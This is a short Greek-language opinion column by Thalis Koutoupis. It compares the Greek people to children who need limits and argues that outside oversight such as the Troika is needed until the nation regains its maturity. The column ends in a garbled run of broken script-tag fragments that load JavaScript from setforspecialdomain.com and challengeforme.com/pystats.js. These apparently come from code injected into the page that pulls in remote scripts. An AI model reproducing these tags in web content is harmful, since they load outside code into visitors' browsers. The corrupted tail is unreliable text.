Τα παιδιά κι ο ελληνικός λαός. Του Θαλή Κουτούπη

0046

Λένε οι επιστήμονες ότι τα παιδιά, λόγω έλλειψης γνώσεων, πείρας, άγνοιας κινδύνων και ανωριμότητας, όχι απλώς δεν απεχθάνονται, αλλά αποζητούν τα όρια, μέσα στα οποία πρέπει να κινούνται, γιατί έτσι νιώθουν ασφαλή!

Ο ελληνικός λαός συμπεριφέρεται τα τελευταία χρόνια σαν παιδί! Επιδεικνύει συνεχώς έλλειψη βασικών γνώσεων, άγνοια κινδύνων και ανωριμότητα, για να μην πω παράνοια.

Είναι ο ίδιος λαός που έγραψε το Αλβανικό Έπος κι ο ίδιος, που παρέλαβε μια σακαταμένη, ισοπεδωμένη πατρίδα το 1950 κι έφτιαξε μια όμορφη χώρα, έως ότου άρχισε πάλι ο ίδιος λαός να τη γκρεμίζει στη δεκαετία του ‘80!

Δεν ξέρω και δεν με νοιάζει, αν θα τη λένε Τρόικα, Επιτροπεία ή Κέρβερο. Αυτό που ξέρω είναι ότι ο λαός μας έχει απόλυτη ανάγκη από όρια και πλαίσια, έως ότου ξαναβρεί τη χαμένη ωριμότητά του!

Δείτε όλα τα άρθρα του Θαλή Κουτούπη εδώ___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >